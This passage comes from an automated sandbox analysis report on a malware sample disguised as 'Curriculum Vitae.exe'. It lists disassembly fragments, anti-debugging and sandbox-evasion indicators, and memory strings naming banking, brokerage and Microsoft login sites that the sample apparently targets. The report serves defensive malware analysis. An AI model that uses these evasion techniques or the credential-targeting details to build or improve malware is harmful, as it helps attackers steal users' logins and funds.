            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411B1C push esi; iretd 2_2_00411B1D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401BC0 pushad ; ret 2_2_00401BEA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417BC5 push ecx; iretd 2_2_00417BC7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E55E push ebx; ret 2_2_0041E566
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417D7F push es; iretd 2_2_00417D80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417D0E push ss; retf 2_2_00417D11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EDC9 push ebp; retf 2_2_0041EDD4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411DF0 push ecx; ret 2_2_00411DF1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402FF0 push eax; ret 2_2_00402FF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04B909AD push ecx; mov dword ptr [esp], ecx 6_2_04B909B6
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0292E180 push esi; retf 6_2_0292E192
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0292E171 push esi; retf 6_2_0292E192
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02934BD2 push ecx; iretd 6_2_02934BD4
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0292EB29 push esi; iretd 6_2_0292EB2A
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0293493F push ebp; retf 6_2_02934940
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02934D8C push es; iretd 6_2_02934D8D
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0292EDFD push ecx; ret 6_2_0292EDFE
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02934D1B push ss; retf 6_2_02934D1E
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0294169E pushfd ; iretd 6_2_029416A1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0293B56B push ebx; ret 6_2_0293B573
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02939A79 pushad ; ret 6_2_02939A7C
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0293BDD6 push ebp; retf 6_2_0293BDE1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_048BC4B4 push esi; retf 6_2_048BC4B5
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_048B47C1 push FFFFFFCFh; iretd 6_2_048B4816
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_048B50E3 push esi; retf 6_2_048B50E5
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_048BF216 push edx; iretd 6_2_048BF224
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00D4F98E
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00DC1C41
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-98832
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | API/Special instruction interceptor: Address: 3BB3204
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\regsvr32.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EBF3 rdtsc 2_2_0041EBF3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | API coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2828 | Thread sleep count: 31 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2828 | Thread sleep time: -62000s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D9DBBE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D6C2A2 FindFirstFileExW,0_2_00D6C2A2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA68EE FindFirstFileW,FindClose,0_2_00DA68EE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DA698F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D076
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D3A9
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA9642
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA979D
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DA9B2B
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DA5C97
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_0293C270 FindFirstFileW,FindNextFileW,FindClose,6_2_0293C270
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: f18641C2.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: f18641C2.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20A
            Source: f18641C2.6.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n PasswordVMware20,11696428655x
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l.comVMware20,11696428655h
            Source: f18641C2.6.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pageVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: blocklistVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: f18641C2.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428
            Source: f18641C2.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: f18641C2.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: f18641C2.6.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,116S
            Source: f18641C2.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270213156.000000000101F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: f18641C2.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: f18641C2.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: f18641C2.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: f18641C2.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,1
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: f18641C2.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: f18641C2.6.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ist test formVMware20,11696428655
            Source: f18641C2.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: firefox.exe, 00000008.00000002.2962113298.0000021E7F07C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@
            Source: f18641C2.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EBF3 rdtsc 2_2_0041EBF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004171C3 LdrLoadDll,2_2_004171C3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DAEAA2 BlockInput,0_2_00DAEAA2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D62622
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D54CE8 mov eax, dword ptr fs:[00000030h] 0_2_00D54CE8
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_03BB34D0 mov eax, dword ptr fs:[00000030h] 0_2_03BB34D0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_03BB3470 mov eax, dword ptr fs:[00000030h] 0_2_03BB3470
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_03BB1E70 mov eax, dword ptr fs:[00000030h] 0_2_03BB1E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
